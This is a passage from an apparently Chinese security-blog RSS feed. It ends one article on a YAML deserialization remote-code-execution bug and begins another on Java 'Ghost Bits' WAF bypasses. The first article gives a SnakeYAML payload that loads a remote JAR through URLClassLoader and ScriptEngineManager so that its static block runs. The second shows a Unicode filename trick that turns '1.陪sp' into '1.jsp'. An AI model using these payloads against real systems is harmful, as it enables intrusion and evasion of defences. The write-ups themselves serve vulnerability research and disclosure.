26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public String getOutputStatement(String toDisplay) {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public String getProgram(String... statements) {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public ScriptEngine </span><span style="box-sizing: border-box;cursor: pointer;line-height: 26px;"><span style="box-sizing: border-box;color: rgb(97, 174, 238);cursor: pointer;line-height: 26px;"><span leaf="">getScriptEngine</span></span></span><span leaf="">() {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">}</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这个 JAR 文件中还必须包含一个文件：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">/META-INF/services/javax.script.ScriptEngineFactory</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">其内容为：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">org.jlleitschuh.sandbox.ScriptEngineFactoryRCE # 我们的 RCE 载荷 把这个 JAR 放在本地服务器根路径对外提供。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">然后调用 Dynamics 的 YAML 解析 API，并传入如下 payload：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [&#34;<a href="http://localhost:8080/" target="_blank">http://localhost:8080/</a>&#34;]]]] payload本质上是在告诉 YAML 解析器：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1.构造一个 URL</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">指向 <a href="http://localhost:8080/" target="_blank">http://localhost:8080/</a></span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2.用这个 URL 构造一个 URLClassLoader</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">也就是让 JVM 可以从这个远程地址加载类</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">3.再把这个 URLClassLoader 作为参数传给 ScriptEngineManager</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">ScriptEngineManager 在初始化时会通过 Java SPI 机制扫描 </span><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf="">META-INF/services/javax.script.ScriptEngineFactory</span></code></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">4.一旦扫描到你远程 JAR 里的 ScriptEngineFactoryRCE</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">JVM 会加载这个类</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">类加载时静态代码块 </span><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf="">static { ... } </span></code><span leaf="">就会执行</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">虽然这是一个YAML 反序列化所导致的问题,但是蛮值得思考</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">像类似于yaml这类配置文件或者说是部署的业务场景很有可能会导致代码执行的问题,可以尽可能地去寻找这类业务场景去尝试,这是一个通用思路</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">假期来了,发个100元优惠券</span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100015731" data-ratio="1.25" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=0cc590a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRzjmw4tKricILicibuLD1ianv8ef2zCdA35BDujXkAtOvK78gflhGuIxtZ3fkKAO7zY0dK3SxMeCEgYU53GpB4UoSaxhqeO2ySzXm4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=ba239ad5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRxsbzx6CUSw1N5K1cCzS9fDjiaQ4Qn9DqLmEVuVueUGf1Feg74mezHMmuFMDY8nO2qIDNJB3SmZ3Jk0MBjbdaRib6c4IUmc1GVq0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/1807214" target="_blank">https://hackerone.com/reports/1807214</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=91660a11&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499380%26idx%3D1%26sn%3Dde9ee1908ac799dac70ffac10ecf3c77">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 30 Apr 2026 10:00:00 +0800</pubDate>
    </item>
    <item>
      <title>Java &#34;幽灵比特位&#34;（Ghost Bits）引发的waf通杀</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499396&amp;idx=1&amp;sn=42f82893ad0bb6a9c4141fc432d2ff7c</link>
      <description>正文Java 是目前企业级应用中最广泛使用的编程语言之一，其生态内的 Spring、Tomcat、Jackso</description>
      <content:encoded><![CDATA[<p><span>迪哥讲事</span> <span>2026-04-29 10:09</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=192dcfb1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRzd72o69M0icibomWsHsUaRs7iaSZ973OCjowDVrs5EKiaaW8V2ggia2V7Z6V2kC7VYs3n1Nk5OHXhudGibeb79T3wJSkwEOKCgzVGcY%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=ad39f821&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRwrVd8MiaiaURXtkzI7rnw1emicpMibBrj09amPaicQuiaoDHwfMo24v5d2dRX8mfsXy7mvxcYzH4gVKiaibaMY6iaqSlmxibdHp6GFd9gfQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Java 是目前企业级应用中最广泛使用的编程语言之一，其生态内的 Spring、Tomcat、Jackson、fastjson 等框架和组件被全球数以亿计的系统所依赖。2026 年 4 月，在 Black Hat Asia 2026 大会上，安全研究员 Zhihui Chen（1ue）与安全研究员 Xinyu Bai（浅蓝）发表了题为《Cast Attack: A New Threat Posed by Ghost Bits in Java》的研究成果。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该研究揭示了 Java 生态中一个系统性、长期被忽视的底层编码缺陷——&#34;Ghost Bits（幽灵比特位）&#34;，并证明攻击者可利用该缺陷对 WAF/IDS 等安全设备实现全面绕过，进而触发 SQL 注入、反序列化 RCE、文件上传、SMTP 注入、请求走私等多种高危攻击链。漏洞影响范围覆盖 Java 主流框架与中间件，利用门槛低，建议相关用户高度重视并尽快完成自查修复。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Ghost Bits/幽灵比特 成因：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Java 里的 char 是 16 位，但某些代码把它强行转成 8 位 byte 。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">结果造成：高 8 位被悄悄丢掉，只剩低 8 位。 攻击者可以利用这个特性，让安全检查看到“奇怪中文/Unicode”，但底层真正执行时变成危险字符</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">比如：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">陪 = U+966A</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">低 8 位 = 0x6A</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">0x6A = ASCII 字符 </span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#39;j&#39;</span></span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">所以：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">1.陪sp</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">在某些 Java 处理链里可能会变成：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">1.jsp</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">WAF / 文件类型检查看到的是：</span></p><pre style="box-sizing: border-box;font-size: 